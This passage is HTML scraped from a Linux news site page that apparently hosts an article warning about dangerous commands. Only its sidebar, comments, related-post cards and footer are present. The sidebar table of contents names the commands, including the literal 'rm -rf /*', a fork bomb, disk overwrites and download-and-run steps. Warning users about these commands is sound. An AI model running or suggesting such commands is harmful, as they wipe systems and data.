<div class="entry-taxonomies">
<span class="category-links term-links category-style-normal">
<a href="https://itsfoss.com/category/list/" rel="tag">List</a> | <a href="https://itsfoss.com/category/news/" rel="tag">News</a> </span>
</div>
<h3 class="entry-title"><a href="https://itsfoss.com/ubuntu-22-04-release-features/" rel="bookmark">Here are the New Features in Ubuntu 22.04 LTS Jammy Jellyfish</a></h3><div class="entry-meta entry-meta-divider-dot">
<span class="posted-by"><span class="meta-label">By</span><span class="author vcard"><a class="url fn n" href="https://itsfoss.com/">Abhishek Prakash</a></span></span> <span class="posted-on">
<time class="entry-date published" datetime="2022-01-12T12:39:14+05:30">January 12, 2022</time><time class="updated" datetime="2022-04-27T08:28:39+05:30">April 27, 2022</time> </span>
<span class="kt-reading-time-wrap"><span class="kt-reading-time"> <span class="kt-reading-time-label">Reading Time:</span> 8 <span class="kt-reading-time-postfix">minutes</span> </span></span></div>
</header>
<div class="entry-summary">
<p>Take a look at all the new features in the upcoming Ubuntu 22.04 LTS release.</p>
</div>
<footer class="entry-footer">
<div class="entry-actions">
<p class="more-link-wrap">
<a href="https://itsfoss.com/ubuntu-22-04-release-features/" class="post-more-link">
Read More<span class="screen-reader-text"> Here are the New Features in Ubuntu 22.04 LTS Jammy Jellyfish</span><span class="kadence-svg-iconset svg-baseline"><svg aria-hidden="true" class="kadence-svg-icon kadence-arrow-right-alt-svg" fill="currentColor" version="1.1" xmlns="http://www.w3.org/2000/svg" width="27" height="28" viewBox="0 0 27 28"><title>Continue</title><path d="M27 13.953c0 0.141-0.063 0.281-0.156 0.375l-6 5.531c-0.156 0.141-0.359 0.172-0.547 0.094-0.172-0.078-0.297-0.25-0.297-0.453v-3.5h-19.5c-0.281 0-0.5-0.219-0.5-0.5v-3c0-0.281 0.219-0.5 0.5-0.5h19.5v-3.5c0-0.203 0.109-0.375 0.297-0.453s0.391-0.047 0.547 0.078l6 5.469c0.094 0.094 0.156 0.219 0.156 0.359v0z"></path>
</svg></span> </a>
</p>
</div>
</footer>
</div>
</article>
</div><div class="carousel-item splide__slide">
<article class="entry content-bg loop-entry post-87340 post type-post status-publish format-standard has-post-thumbnail hentry category-terminal-tricks category-how-to tag-ubuntu">
<a class="post-thumbnail kadence-thumbnail-ratio-2-3" href="https://itsfoss.com/ppa-purge/">
<div class="post-thumbnail-inner">
<img width="768" height="432" src="https://itsfoss.com/wp-content/uploads/2021/02/ppa-purge-768x432.png" class="attachment-medium_large size-medium_large wp-post-image jetpack-lazy-image" alt="What is PPA Purge? How to Use it in Ubuntu and other Debian-based Distributions?" data-attachment-id="87364" data-permalink="https://itsfoss.com/ppa-purge/ppa-purge-2/" data-orig-file="https://itsfoss.com/wp-content/uploads/2021/02/ppa-purge.png" data-orig-size="800,450" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="ppa-purge" data-image-description data-image-caption data-medium-file="https://itsfoss.com/wp-content/uploads/2021/02/ppa-purge-300x169.png" data-large-file="https://itsfoss.com/wp-content/uploads/2021/02/ppa-purge.png" data-lazy-srcset="https://itsfoss.com/wp-content/uploads/2021/02/ppa-purge-768x432.png 768w, https://itsfoss.com/wp-content/uploads/2021/02/ppa-purge-300x169.png 300w, https://itsfoss.com/wp-content/uploads/2021/02/ppa-purge-100x56.png 100w, https://itsfoss.com/wp-content/uploads/2021/02/ppa-purge-150x84.png 150w, https://itsfoss.com/wp-content/uploads/2021/02/ppa-purge.png 800w" data-lazy-sizes="(max-width: 768px) 100vw, 768px" data-lazy-src="https://itsfoss.com/wp-content/uploads/2021/02/ppa-purge-768x432.png?is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"> </div>
</a>
<div class="entry-content-wrap">
<header class="entry-header">
<div class="entry-taxonomies">
<span class="category-links term-links category-style-normal">
<a href="https://itsfoss.com/category/terminal-tricks/" rel="tag">Terminal Tools and Tricks</a> | <a href="https://itsfoss.com/category/how-to/" rel="tag">Tutorial</a> </span>
</div>
<h3 class="entry-title"><a href="https://itsfoss.com/ppa-purge/" rel="bookmark">What is PPA Purge? How to Use it in Ubuntu and other Debian-based Distributions?</a></h3><div class="entry-meta entry-meta-divider-dot">
<span class="posted-by"><span class="meta-label">By</span><span class="author vcard"><a class="url fn n" href="https://itsfoss.com/">Abhishek Prakash</a></span></span> <span class="posted-on">
<time class="entry-date published" datetime="2021-02-16T18:52:29+05:30">February 16, 2021</time><time class="updated" datetime="2021-02-16T18:52:33+05:30">February 16, 2021</time> </span>
<span class="kt-reading-time-wrap"><span class="kt-reading-time"> <span class="kt-reading-time-label">Reading Time:</span> 7 <span class="kt-reading-time-postfix">minutes</span> </span></span></div>
</header>
<div class="entry-summary">
<p>PPA Purge is handy command line utility for disabling a PPA and remove or downgrade the package installed with it.</p>
</div>
<footer class="entry-footer">
<div class="entry-actions">
<p class="more-link-wrap">
<a href="https://itsfoss.com/ppa-purge/" class="post-more-link">
Read More<span class="screen-reader-text"> What is PPA Purge? How to Use it in Ubuntu and other Debian-based Distributions?</span><span class="kadence-svg-iconset svg-baseline"><svg aria-hidden="true" class="kadence-svg-icon kadence-arrow-right-alt-svg" fill="currentColor" version="1.1" xmlns="http://www.w3.org/2000/svg" width="27" height="28" viewBox="0 0 27 28"><title>Continue</title><path d="M27 13.953c0 0.141-0.063 0.281-0.156 0.375l-6 5.531c-0.156 0.141-0.359 0.172-0.547 0.094-0.172-0.078-0.297-0.25-0.297-0.453v-3.5h-19.5c-0.281 0-0.5-0.219-0.5-0.5v-3c0-0.281 0.219-0.5 0.5-0.5h19.5v-3.5c0-0.203 0.109-0.375 0.297-0.453s0.391-0.047 0.547 0.078l6 5.469c0.094 0.094 0.156 0.219 0.156 0.359v0z"></path>
</svg></span> </a>
</p>
</div>
</footer>
</div>
</article>
</div> </div>
</div>
</div>
</div>
</div>
</div>
<div id="comments" class="comments-compat-kadence">
<div id="thrive-comments" class="clearfix">
<div class="tcm-dot-loader">
<span class="inner1"></span>
<span class="inner2"></span>
<span class="inner3"></span>
</div>
<div class="thrive-comments-content">
<div class="tcm-comments-filter"></div>
<div class="tcm-comments-create" id="respond"></div>
<div class="tcm-comments-list">
<li id="comment-375863" class="comment even thread-even depth-1">
<article id="div-comment-375863" class="comment-body">
<footer class="comment-meta">
<div class="comment-author vcard">
<img alt src="https://itsfoss.com/wp-content/gravatars/519a2e28646dfc5b40a8f2552a1779cc" class="avatar avatar-32 photo jetpack-lazy-image" height="32" width="32" data-lazy-srcset="https://itsfoss.com/wp-content/gravatars/519a2e28646dfc5b40a8f2552a1779cc 2x" data-lazy-src="https://itsfoss.com/wp-content/gravatars/519a2e28646dfc5b40a8f2552a1779cc?is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"><noscript><img data-lazy-fallback="1" alt='' src='https://itsfoss.com/wp-content/gravatars/519a2e28646dfc5b40a8f2552a1779cc' srcset='https://itsfoss.com/wp-content/gravatars/519a2e28646dfc5b40a8f2552a1779cc 2x' class='avatar avatar-32 photo' height='32' width='32' loading='lazy' /></noscript> <b class="fn">Sampath</b> <span class="says">says:</span> </div>
<div class="comment-metadata">
<a href="https://itsfoss.com/dangerous-linux-commands/#comments/375863"><time datetime="2022-09-12T07:49:30+05:30">September 12, 2022 at 7:49 am</time></a> </div>
</footer>
<div class="comment-content">
<p>Many thanks for sharing, Good post.</p>
</div>
<div class="reply"><a rel='nofollow' class='comment-reply-link' href='https://itsfoss.com/dangerous-linux-commands/?replytocom=375863#comments/375863#respond' data-commentid="375863" data-postid="101619" data-belowelement="div-comment-375863" data-respondelement="respond" data-replyto="Reply to Sampath" aria-label='Reply to Sampath'>Reply</a></div> </article>
</li>
<li id="comment-375844" class="comment odd alt thread-odd thread-alt depth-1">
<article id="div-comment-375844" class="comment-body">
<footer class="comment-meta">
<div class="comment-author vcard">
<img alt src="https://itsfoss.com/wp-content/gravatars/3c5c2e878f363f3f3a0933a4a1cf812f" class="avatar avatar-32 photo jetpack-lazy-image" height="32" width="32" data-lazy-srcset="https://itsfoss.com/wp-content/gravatars/3c5c2e878f363f3f3a0933a4a1cf812f 2x" data-lazy-src="https://itsfoss.com/wp-content/gravatars/3c5c2e878f363f3f3a0933a4a1cf812f?is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"><noscript><img data-lazy-fallback="1" alt='' src='https://itsfoss.com/wp-content/gravatars/3c5c2e878f363f3f3a0933a4a1cf812f' srcset='https://itsfoss.com/wp-content/gravatars/3c5c2e878f363f3f3a0933a4a1cf812f 2x' class='avatar avatar-32 photo' height='32' width='32' loading='lazy' /></noscript> <b class="fn">deleatur</b> <span class="says">says:</span> </div>
<div class="comment-metadata">
<a href="https://itsfoss.com/dangerous-linux-commands/#comments/375844"><time datetime="2022-09-12T04:15:03+05:30">September 12, 2022 at 4:15 am</time></a> </div>
</footer>
<div class="comment-content">
<p>&#8216;There is a famous computing term PEBKAC; “problem exists between keyboard and chair.”&#8217;<br />
Excellent!</p>
</div>
<div class="reply"><a rel='nofollow' class='comment-reply-link' href='https://itsfoss.com/dangerous-linux-commands/?replytocom=375844#comments/375844#respond' data-commentid="375844" data-postid="101619" data-belowelement="div-comment-375844" data-respondelement="respond" data-replyto="Reply to deleatur" aria-label='Reply to deleatur'>Reply</a></div> </article>
</li>
<li id="comment-375805" class="comment even thread-even depth-1">
<article id="div-comment-375805" class="comment-body">
<footer class="comment-meta">
 <div class="comment-author vcard">
<img alt src="https://itsfoss.com/wp-content/gravatars/876ce44a21fc9da587456e61558ce21f" class="avatar avatar-32 photo jetpack-lazy-image" height="32" width="32" data-lazy-srcset="https://itsfoss.com/wp-content/gravatars/876ce44a21fc9da587456e61558ce21f 2x" data-lazy-src="https://itsfoss.com/wp-content/gravatars/876ce44a21fc9da587456e61558ce21f?is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"><noscript><img data-lazy-fallback="1" alt='' src='https://itsfoss.com/wp-content/gravatars/876ce44a21fc9da587456e61558ce21f' srcset='https://itsfoss.com/wp-content/gravatars/876ce44a21fc9da587456e61558ce21f 2x' class='avatar avatar-32 photo' height='32' width='32' loading='lazy' /></noscript> <b class="fn">sapo</b> <span class="says">says:</span> </div>
<div class="comment-metadata">
<a href="https://itsfoss.com/dangerous-linux-commands/#comments/375805"><time datetime="2022-09-11T20:04:40+05:30">September 11, 2022 at 8:04 pm</time></a> </div>
</footer>
<div class="comment-content">
<p>You should acknowledge the author of the fork bomb that you cited, since it&#8217;s supposed to be an art work <a href="https://jaromil.dyne.org/journal/forkbomb.html" rel="nofollow ugc">https://jaromil.dyne.org/journal/forkbomb.html</a></p>
</div>
<div class="reply"><a rel='nofollow' class='comment-reply-link' href='https://itsfoss.com/dangerous-linux-commands/?replytocom=375805#comments/375805#respond' data-commentid="375805" data-postid="101619" data-belowelement="div-comment-375805" data-respondelement="respond" data-replyto="Reply to sapo" aria-label='Reply to sapo'>Reply</a></div> </article>
</li>
</div>
<div class="tcm-lazy-comments"></div>
</div>
</div>
</div>
</div>
</main>
<link rel='stylesheet' id='kadence-sidebar-css' href='https://itsfoss.com/wp-content/themes/kadence/assets/css/sidebar.min.css?ver=1.1.27' media='all' />
<aside id="secondary" role="complementary" class="primary-sidebar widget-area sidebar-slug-sidebar-primary sidebar-link-style-normal">
<div class="sidebar-inner-wrap">
<section id="block-3" class="widget widget_block"><link rel='stylesheet' id='kadence-blocks-table-of-contents-css' href='https://itsfoss.com/wp-content/plugins/kadence-blocks/dist/blocks/tableofcontents.style.build.css?ver=2.4.14' media='all' />
<style id='kb-tableofcontents_78fb27-09-inline-css'>
.kb-table-of-content-nav.kb-table-of-content-id_78fb27-09 .kb-table-of-content-wrap{padding:0px 0px 0px 0px;}
</style>
<nav class="wp-block-kadence-tableofcontents kb-table-of-content-nav kb-table-of-content-id_78fb27-09 " role="navigation" aria-label="Table Of Contents"><div class="kb-table-of-content-wrap"><div class="kb-table-of-contents-title-wrap kb-toggle-icon-style-arrow"><span class="kb-table-of-contents-title">Table of Contents</span></div><ul class="kb-table-of-content-list kb-table-of-content-list-columns-1 kb-table-of-content-list-style-disc kb-table-of-content-link-style-underline"><li><a class="kb-table-of-contents__entry" href="#1-rm-rf-">1. rm -rf /*</a></li><li><a class="kb-table-of-contents__entry" href="#2-overwrite-your-partition">2. Overwrite your partition</a></li><li><a class="kb-table-of-contents__entry" href="#3-move-everything-into-the-void">3. Move everything into the void</a></li><li><a class="kb-table-of-contents__entry" href="#4-format-your-hard-drive">4. Format your hard drive</a></li><li><a class="kb-table-of-contents__entry" href="#5-fork-bomb">5. Fork bomb</a></li><li><a class="kb-table-of-contents__entry" href="#6-overwrite-important-configuration-files">6. Overwrite important configuration files</a></li><li><a class="kb-table-of-contents__entry" href="#7-replace-partition-with-garbage-data">7. Replace partition with garbage data</a></li><li><a class="kb-table-of-contents__entry" href="#8-expose-your-system-to-everyone">8. Expose your system to everyone</a></li><li><a class="kb-table-of-contents__entry" href="#9-download-and-run-malicious-content">9. Download and run malicious content</a></li><li><a class="kb-table-of-contents__entry" href="#10-disguised-commands">10. Disguised commands</a></li><li><a class="kb-table-of-contents__entry" href="#wrapping-up">Wrapping Up</a></li></ul></div></nav></section><section id="siq_search_widget-6" class="widget widget_siq_search_widget"><h2 class="widget-title">Don&#8217;t find what you are looking for?</h2><div id="siq-expandwdgt-cont" class="siq-expandwdgt-cont">
<form class="siq-expandwdgt" action="https://itsfoss.com">
<input type="search" placeholder="Search the website here" value="" name="s" class="siq-expandwdgt-input"><input type="hidden" value="post,page" name="postTypes" /><span class="siq-expandwdgt-icon"></span>
</form>
</div></section><section id="block-2" class="widget widget_block"><style id='kt-blocks_983539-23-inline-css'>
#kt-modal_983539-23 .kt-blocks-modal-link {color:var(--global-palette9);background:var(--global-palette1);border-color:#555555;border-radius:4px;font-size:16px;line-height:24px;border-width:2px 2px 2px 2px;padding:4px 8px 4px 8px;margin:0px 0px 0px 0px;}#kt-modal_983539-23 .kt-blocks-modal-link:hover, #kt-modal_983539-23 .kt-blocks-modal-link:focus {color:#ffffff;background:#444444;border-color:#444444;}#kt-modal_983539-23 .kt-modal-container, #kt-target-modal_983539-23 .kt-modal-container, .kb-modal-content_983539-23 .kt-modal-container {max-width:800px;}
</style>
<div id="kt-modal_983539-23" class="wp-block-kadence-modal aligncenter kt-modal-linkalign-center"><div id="kt-target-modal_983539-23" class="kb-modal-content_983539-23 kadence-block-pro-modal kt-m-animate-in-fadeup kt-m-animate-out-fadeout" aria-hidden="true"><div class="kt-modal-overlay" tabindex="-1" data-modal-close="true"><div class="kt-modal-container kt-modal-height-fittocontent kt-close-position-inside" role="dialog" aria-modal="true"><button class="kt-modal-close" aria-label="Close Modal" data-modal-close="true"><svg viewBox="0 0 24 24" fill="none" stroke="currentColor" xmlns="https://www.w3.org/2000/svg" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><line x1="18" y1="6" x2="6" y2="18"></line><line x1="6" y1="6" x2="18" y2="18"></line></svg></button><div id="kt-modal_983539-23-content" class="kt-modal-content">
<h3 class="">Well done, Sherlock!</h3>
<p class="">Your sharp observation skill and intellect have identified a potential issue with this article.</p>
<p class=""><strong><em>Is it a grammatical mistake or a simple typo?</em></strong> That happens from time to time.</p>
<p class=""><strong><em>Is there some incorrect technical information?</em></strong> It's possible that we were not clear on the topic. </p>
<p class=""><strong><em>Part of the article contains outdated steps or commands?</em></strong> We have over 1500 articles in the last ten years. It's possible that some articles that worked well five years ago won't work today.</p>
<p class=""><strong><em>Is there an issue with the UI and UX of the website?</em></strong> Some button not working? Link leading to a dead page? Or any other issue with the website elements?</p>
<p class="">Dear Holmes, help your Watson (that's us) by explaining the details.</p>
<div class="wpforms-container wpforms-container-full" id="wpforms-17637"><form id="wpforms-form-17637" class="wpforms-validate wpforms-form" data-formid="17637" method="post" enctype="multipart/form-data" action="/dangerous-linux-commands/" data-token="c2b06c4fef4250eb1c6f8c3cbe41d027"><noscript class="wpforms-error-noscript">Please enable JavaScript in your browser to complete this form.</noscript><div class="wpforms-field-container"><div id="wpforms-17637-field_2-container" class="wpforms-field wpforms-field-radio" data-field-id="2"><label class="wpforms-field-label" for="wpforms-17637-field_2">What kind of issue is it? <span class="wpforms-required-label">*</span></label><ul id="wpforms-17637-field_2" class="wpforms-field-required"><li class="choice-1 depth-1"><input type="radio" id="wpforms-17637-field_2_1" name="wpforms[fields][2]" value="Grammatical Error" required><label class="wpforms-field-label-inline" for="wpforms-17637-field_2_1">Grammatical Error</label></li><li class="choice-2 depth-1"><input type="radio" id="wpforms-17637-field_2_2" name="wpforms[fields][2]" value="Incorrect technical information" required><label class="wpforms-field-label-inline" for="wpforms-17637-field_2_2">Incorrect technical information</label></li><li class="choice-3 depth-1"><input type="radio" id="wpforms-17637-field_2_3" name="wpforms[fields][2]" value="Outdated information or commands" required><label class="wpforms-field-label-inline" for="wpforms-17637-field_2_3">Outdated information or commands</label></li><li class="choice-4 depth-1"><input type="radio" id="wpforms-17637-field_2_4" name="wpforms[fields][2]" value="Other" required><label class="wpforms-field-label-inline" for="wpforms-17637-field_2_4">Other</label></li></ul></div><div id="wpforms-17637-field_5-container" class="wpforms-field wpforms-field-url" data-field-id="5"><label class="wpforms-field-label" for="wpforms-17637-field_5">Link to the article that needs to be updated <span class="wpforms-required-label">*</span></label><input type="url" id="wpforms-17637-field_5" class="wpforms-field-medium wpforms-field-required" name="wpforms[fields][5]" value="https://itsfoss.com/dangerous-linux-commands/" required></div><div id="wpforms-17637-field_4-container" class="wpforms-field wpforms-field-textarea" data-field-id="4"><label class="wpforms-field-label" for="wpforms-17637-field_4">Message <span class="wpforms-required-label">*</span></label><textarea id="wpforms-17637-field_4" class="wpforms-field-medium wpforms-field-required" name="wpforms[fields][4]" required></textarea><div class="wpforms-field-description">Please provide as much detail as you can.</div></div><div id="wpforms-17637-field_0-container" class="wpforms-field wpforms-field-name" data-field-id="0"><label class="wpforms-field-label" for="wpforms-17637-field_0">Name <span class="wpforms-required-label">*</span></label><input type="text" id="wpforms-17637-field_0" class="wpforms-field-medium wpforms-field-required" name="wpforms[fields][0]" required></div><div id="wpforms-17637-field_1-container" class="wpforms-field wpforms-field-email" data-field-id="1"><label class="wpforms-field-label" for="wpforms-17637-field_1">E-mail <span class="wpforms-required-label">*</span></label><input type="email" id="wpforms-17637-field_1" class="wpforms-field-medium wpforms-field-required" name="wpforms[fields][1]" required><div class="wpforms-field-description">Please enter your email, so that we can personally thank you and further discuss it (if needed).</div></div><div id="wpforms-17637-field_9-container" class="wpforms-field wpforms-field-captcha" data-field-id="9"><label class="wpforms-field-label" for="wpforms-17637-field_9">Are you human? <span class="wpforms-required-label">*</span></label> <div class="wpforms-captcha-math">
<span class="wpforms-captcha-equation">
<span class="n1"></span>
<span class="cal"></span>
<span class="n2"></span>
<span class="e">=</span>
</span>
<input type="text" id="wpforms-17637-field_9" class="wpforms-field-medium wpforms-field-required a" data-rule-wpf-captcha="math" name="wpforms[fields][9][a]" required> <input type="hidden" name="wpforms[fields][9][cal]" class="cal">
<input type="hidden" name="wpforms[fields][9][n2]" class="n2">
<input type="hidden" name="wpforms[fields][9][n1]" class="n1">
</div>
</div></div><div class="wpforms-field wpforms-field-hp"><label for="wpforms-17637-field-hp" class="wpforms-field-label">Comment</label><input type="text" name="wpforms[hp]" id="wpforms-17637-field-hp" class="wpforms-field-medium"></div><div class="wpforms-submit-container"><input type="hidden" name="wpforms[id]" value="17637"><input type="hidden" name="wpforms[author]" value="1"><input type="hidden" name="wpforms[post_id]" value="101619"><button type="submit" name="wpforms[submit]" id="wpforms-submit-17637" class="wpforms-submit om-trigger-conversion" data-alt-text="Sending..." data-submit-text="Submit" aria-live="assertive" value="wpforms-submit">Submit</button></div></form></div> </div></div></div></div><button class="kt-blocks-modal-link kt-modal-label-show" data-modal-open="kt-target-modal_983539-23"><span class="kt-blocks-modal-link-inner">Article Needs Update?</span></button></div>
</section><section id="custom_html-4" class="widget_text widget widget_custom_html"><div class="textwidget custom-html-widget">
<div align="center" data-freestar-ad="__300x250" id="itsfoss_300x250_Sidebar1">
<script data-cfasync="false" type="text/javascript">
    freestar.config.enabled_slots.push({ placementName: "itsfoss_300x250_Sidebar1", slotId: "itsfoss_300x250_Sidebar1" });
  </script>
</div></div></section><section id="custom_html-5" class="widget_text widget widget_custom_html"><div class="textwidget custom-html-widget">
<div align="center" data-freestar-ad="__300x250" id="itsfoss_300x250_300x600_Sidebar2">
<script data-cfasync="false" type="text/javascript">
    freestar.config.enabled_slots.push({ placementName: "itsfoss_300x250_300x600_Sidebar2", slotId: "itsfoss_300x250_300x600_Sidebar2" });
  </script>
</div></div></section> </div>
</aside>
</div>
</div>
</div>
<link rel='stylesheet' id='kadence-footer-css' href='https://itsfoss.com/wp-content/themes/kadence/assets/css/footer.min.css?ver=1.1.27' media='all' />
<footer id="colophon" class="site-footer" role="contentinfo">
<div class="site-footer-wrap">
<div class="site-top-footer-wrap site-footer-row-container site-footer-focus-item site-footer-row-layout-standard site-footer-row-tablet-layout-default site-footer-row-mobile-layout-default" data-section="kadence_customizer_footer_top">
<div class="site-footer-row-container-inner">
<div class="site-container">
<div class="site-top-footer-inner-wrap site-footer-row site-footer-row-columns-3 site-footer-row-column-layout-equal site-footer-row-tablet-column-layout-default site-footer-row-mobile-column-layout-row ft-ro-dir-row ft-ro-collapse-normal ft-ro-t-dir-default ft-ro-m-dir-default ft-ro-lstyle-plain">
<div class="site-footer-top-section-1 site-footer-section footer-section-inner-items-1">
<div class="footer-widget-area widget-area site-footer-focus-item footer-widget5 content-align-default content-tablet-align-default content-mobile-align-default content-valign-default content-tablet-valign-default content-mobile-valign-default" data-section="sidebar-widgets-footer5">
<div class="footer-widget-area-inner site-info-inner">
<section id="linkcat-2014" class="widget widget_links"><h2 class="widget-title">About Pages</h2>
<ul class='xoxo blogroll'>
<li><a href="https://itsfoss.com/about/" title="Know more about us">About It&#039;s FOSS</a></li>
<li><a href="https://itsfoss.com/its-foss-team/" title="Team behind It&#8217;s FOSS">Meet the team</a></li>
<li><a href="https://itsfoss.com/donations-foss/" title="Check out donations made by us to Open Source projects">We Donate to FOSS Projects</a></li>
</ul>
</section>
<section id="linkcat-1482" class="widget widget_links"><h2 class="widget-title">Contact Pages</h2>
<ul class='xoxo blogroll'>
<li><a href="https://itsfoss.com/contact-us/">Contact Us</a></li>
<li><a href="https://itsfoss.com/copyright/" rel="noopener" title="Creative Commons License" target="_blank">Copyright: CC By SA</a></li>
<li><a href="https://itsfoss.com/get-featured-on-its-foss/" title="Want your product to be featured on It&#8217;s FOSS?">Get Featured on It&#039;s FOSS</a></li>
<li><a href="https://itsfoss.com/request-tutorial/" title="Can&#8217;t find what you are looking for? Tell us.">Request a tutorial</a></li>
</ul>
</section>
</div>
</div>
</div>
<div class="site-footer-top-section-2 site-footer-section footer-section-inner-items-1">
<div class="footer-widget-area widget-area site-footer-focus-item footer-widget2 content-align-default content-tablet-align-default content-mobile-align-default content-valign-default content-tablet-valign-default content-mobile-valign-default" data-section="sidebar-widgets-footer2">
<div class="footer-widget-area-inner site-info-inner">
<section id="linkcat-2012" class="widget widget_links"><h2 class="widget-title">Communities</h2>
<ul class='xoxo blogroll'>
<li><a href="https://t.me/itsfoss_official" title="Join our private Telegram Channel with over 500 members to get the updates instantly">Exclusive Telegram Channel</a></li>
<li><a href="https://itsfoss.community/" rel="noopener" title="Official forum for It&#8217;s FOSS readers" target="_blank">It&#039;s FOSS Forum</a></li>
<li><a href="https://www.linkedin.com/groups/8597839" title="A community for FOSS Professionals">Join LinkedIn Community</a></li>
<li><a href="https://www.facebook.com/groups/LinuxUsersGroupOfficial/" title="Join our exclusive Linux Users Group with over 90,000 Linux enthusiasts">Linux Users Group on Facebook</a></li>
<li><a href="https://www.reddit.com/r/LinuxUsersGroup/" title="Join our Subreddit and interact with a passionate Linux community">Linux Users Group on Reddit</a></li>
</ul>
</section>
<section id="linkcat-2013" class="widget widget_links"><h2 class="widget-title">Policies</h2>
<ul class='xoxo blogroll'>
<li><a href="https://itsfoss.com/affiliate-policy/" rel="noopener" title="Affiliate Policy" target="_blank">Affiliate Policy</a></li>
<li><a href="https://itsfoss.com/privacy-policy/">Privacy Policy</a></li>
</ul>
</section>
</div>
</div>
</div>
<div class="site-footer-top-section-3 site-footer-section footer-section-inner-items-1">
<div class="footer-widget-area widget-area site-footer-focus-item footer-widget1 content-align-default content-tablet-align-default content-mobile-align-default content-valign-default content-tablet-valign-default content-mobile-valign-default" data-section="sidebar-widgets-footer1">
<div class="footer-widget-area-inner site-info-inner">
<section id="linkcat-2015" class="widget widget_links"><h2 class="widget-title">Follow us, Stalk us, We don't mind</h2>
<ul class='xoxo blogroll'>
<li><a href="https://www.facebook.com/itsfoss/" title="The best Linux related page on the entire Facebook">Follow us on Facebook</a></li>
<li><a href="https://www.instagram.com/itsfoss/" title="Follow us for Linux related images">Follow us on Instagram</a></li>
<li><a href="https://lbry.tv/$/invite/@itsfoss:0" rel="noopener" title="Open source YouTube alternative" target="_blank">Follow us on LBRY</a></li>
<li><a href="https://mastodon.social/@itsfoss" rel="me noopener" title="Follow It&#8217;s FOSS on Mastodon Platform" target="_blank">Follow us on Mastodon</a></li>
<li><a href="https://www.pinterest.fr/its_foss/" title="Follow us on Pinterest">Follow us on Pinterest</a></li>
<li><a href="https://twitter.com/itsfoss2" title="Follow us on Twitter">Follow us on Twitter</a></li>
<li><a href="https://itsfoss.com/feed/" rel="noopener" target="_blank">Follow us via RSS Feed</a></li>
<li><a href="https://itsfoss.com/subscribe-to-newsletter/" title="Subscribe to daily or weekly newsletter">Subscribe to Newsletter</a></li>
<li><a href="https://www.youtube.com/c/itsfoss?sub_confirmation=1" title="Subscribe to our rapidly growing YouTube channel">Subscribe to YouTube Channel</a></li>
</ul>
</section>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="site-bottom-footer-wrap site-footer-row-container site-footer-focus-item site-footer-row-layout-standard site-footer-row-tablet-layout-default site-footer-row-mobile-layout-default" data-section="kadence_customizer_footer_bottom">
<div class="site-footer-row-container-inner">
<div class="site-container">
<div class="site-bottom-footer-inner-wrap site-footer-row site-footer-row-columns-1 site-footer-row-column-layout-row site-footer-row-tablet-column-layout-default site-footer-row-mobile-column-layout-row ft-ro-dir-row ft-ro-collapse-normal ft-ro-t-dir-default ft-ro-m-dir-default ft-ro-lstyle-plain">
<div class="site-footer-bottom-section-1 site-footer-section footer-section-inner-items-1">
<div class="footer-widget-area site-info site-footer-focus-item content-align-default content-tablet-align-default content-mobile-align-default content-valign-default content-tablet-valign-default content-mobile-valign-default" data-section="kadence_customizer_footer_html">
<div class="footer-widget-area-inner site-info-inner">
<div class="footer-html inner-link-style-normal"><div class="footer-html-inner"><p>&copy; CC-by-SA | It&#039;s FOSS is part of CHMOD777 Media Tech Pvt Ltd</p>
</div></div> </div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</footer>
</div>
<script>document.documentElement.style.setProperty('--scrollbar-offset', window.innerWidth - document.documentElement.clientWidth + 'px' );</script>
<script type="text/template" id="comments-conversion"><# if ( html_switch === 'tcm_live_update' ) { #>
<div class="tcm-thank-you-submited tcm-border-color-ac">
	<#= custom_message #>
</div>
<# } #>
<# if ( html_switch === 'tcm_related_posts' ) { #>
<div class="tcm-posts tcm-border-color-ac">
	<#= custom_message #>
	<div class="tcm-posts-list <# if ( ! show_featured_image ) { #> no-featured-image <# } #> clear-this posts-length-<#= ThriveComments.related_posts.length #>">
		<# ThriveComments.related_posts.forEach( function ( value ) { #>
		<div class="tcm-post tcm-color-ac <# if ( ! show_featured_image ) { #> tcm-border-bottom-color-ac <# } #>">
			<# if ( show_featured_image ) { #>
			<div>
				<a href="<#= value.guid #>" style="background-image: url(<#= value.featured_image #>)" class="tcm-related-thumbnail <# if ( ! value.featured_image ) { #>tcm-no-featured-image<# } #>">
				</a>
			</div>
			<# } #>
			<h3><a href="<#= value.guid #>">

								<span>
									<svg class="related-posts-arrow tcm-svg-fill-ac"><use xlink:href="#tcm-related-posts-arrow"></use></svg>								</span>


					<#= value.post_title #>

				</#></a></h3>
		</div>
		<# } ) #>
	</div>
</div>
<# } #>
<# if ( html_switch === 'tcm_social_share' ) { #>
<div class="tcm-share-post tcm-border-color-ac">
	<#= custom_message #>
	<div class="share-buttons">
		<# if ( share_btns.fb_share ) { #>
		<div class="fb-button" data-href="http://www.facebook.com/share.php"></div>
		<# } #>
		<# if ( share_btns.tw_share ) { #>
		<div class="tw-button" data-href="https://twitter.com/intent/tweet"></div>
		<# } #>
		<# if ( share_btns.lk_share ) { #>
		<div class="in-button" data-href="https://www.linkedin.com/cws/share"></div>
		<# } #>
		<# if ( share_btns.pt_share ) { #>
		<div class="pt-button" data-href="http://pinterest.com/pin/create/button"></div>
		<# } #>
		<# if ( share_btns.xi_share ) { #>
		<div class="xi-button" data-href="https://www.xing.com/spi/shares/new"></div>
		<# } #>
	</div>
</div>
<# } #>
